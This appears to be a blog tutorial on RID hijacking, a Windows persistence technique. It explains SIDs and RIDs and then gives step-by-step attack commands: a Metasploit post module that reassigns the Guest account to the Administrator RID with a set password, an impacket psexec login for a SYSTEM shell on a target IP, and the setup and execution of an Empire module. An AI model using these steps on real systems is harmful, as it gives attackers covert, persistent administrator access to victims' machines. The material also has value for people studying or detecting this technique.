In this post, we will be discussed on
RID hijacking which is considered as persistence technique in term of cyber
kill chain and in this article, you will learn multiple ways to perform RID
hijacking.
Table
of Content
Introduction
·
FSMO roles
·
SID & RID
·
Syntax
·
Important Key points
RID-Hijacking
·
Metasploit
·
Empire
Introduction
Microsoft divided
the responsibilities of a DC into FSMO roles that together make a full AD
system, FSMO (Flexible
Single Master Operation) has 5 reponsibilties for forest and domain.
·
Schema
Master (one per forest)
·
Domain
Naming Master (one per forest)
·
Relative
identifier (RID) Master (one
per domain)
·
Primary
Domain Controller (PDC) Emulator (one per domain)
·
Infrastructure
Master (one per domain)
SID & RID
The RID is a Relative Identifier which is
the last part of SID (security identifier) and should be unique for a particular
object within a domain. Each security principal
has a unique SID that is issued by a security agent. The agent can be a Windows
local system or domain. The agent generates the SID when the security principal
is created. The SID can be represented as a character string or as a structure.
Syntax
Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-...-[SubAuthority[SubAuthorityCount]](-RID)
Eg: S-1-5-21-1543651058-3042185658-368006193-1001
Important Key points
·
The
revision is always 1 for current NT versions.
·
When a
new issuing authority is established under Windows (for example, a new computer
is deployed or a domain is established), a SID with an arbitrary value of 5 is
allocated as an identifier authority.
·
A
constant value of 21 is used as a particular value for the root of this group
of sub-authorities, and a 96-bit random number is generated and parceled out to
the three sub-authorities with each sub-authority having a 32-bit chunk.
·
If the
new issuing authority under which this SID was developed is a domain, this SID
is referred to as the "SID domain."
·
Windows
allocates RIDs starting at 1,000; RIDs that have a value of less than 1,000 are
considered reserved and are used for special accounts.
·
For
example, all Windows accounts with a RID of 500 are considered built-in administrator
accounts in their respective issuing authorities.
RID Hijacking
'RID Hijacking' is a tactic for an adversary
to persist inside victim’s system by hijacking the RID the Administrator
account for the Guest account, or another local account. Creating persistence
in victim’s system allows an adversary to establish a foothold, continuously
regaining access that will unseen to you and allow to hijacker to logon as an
authorized account which adversary has hijacked.
Thus, for this you need to have privilege
account session as we have in the below image to establish a persistence
access.
Rid-Hijacking: Metasploit
So, as you know, we had meterperter session
with admin privilege and Metasploit provides a module to create a persistence
in victim’s machine by hijacking RID of administrator user.
This
module will create an entry on the target by modifying some properties of an
existing account. It will change the account attributes by setting a Relative
Identifier (RID), which should be owned by one existing account on the
destination machine. Taking advantage of some Windows Local Users Management
integrity issues, this module will allow to authenticate with one known account
credentials (like GUEST account), and access with the privileges of another
existing account (like ADMINISTRATOR account), even if the spoofed account is
disabled.
use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit
once you will run the exploit, will
check state for guest account and if found disable then first it will activate
the account and then overwrite RID value from 501 to 500 i.e RID of
administrator account.
As you have seen in the above step, the RID
of guest is 500 and password is 123 thus we logged as guest we should get
administrator privilege CMD of the target machine. Here we are going to use
impacket tool to get the CMD shell of the remote machine.
cd /impacket/example
./psexec.py Guest:123@ 192.168.1.107
As you can observe that we have obtain CMD
Shell as “nt authority /system” i.e CMD as administrator account.
Rid-Hijacking: Empire
RID hijacking is also possible using empire
but this module in not available in Empire project you need to clone it module
from github.
once both programs get downloaded fetch
the Invoke-RIDHijacking.ps1 file from inside /RID-Hijacking/modules/empire/data/module_source/persistence
into /root/Empire/data/module_source/persistence.
cd
RID-Hijacking/modules/empire/data/module_source/persistence
cp Invoke-RIDHijacking.ps1
/root/Empire/data/module_source/persistence
Also copy the rid_hijack.py from
/RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into
/root/Empire/lib/modules/powershell/persistence/elevated
cd
RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated
cp rid_hijack.py
/root/Empire/lib/modules/powershell/persistence/elevated
Once you are done with configuration
then launch the module to start the attack, this will initialise the just like
Metasploit. First identify the state of guest account and then hijack RID 500
for guest user.
usemodule
persistence/elevated/rid_hijack*
set UserGuest True
set Password 123
set Enable True
execute
Again repeat the above step to connect CMD
of victim’s machine assure that you should have a privilege shell.
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164
0 comments:
Post a Comment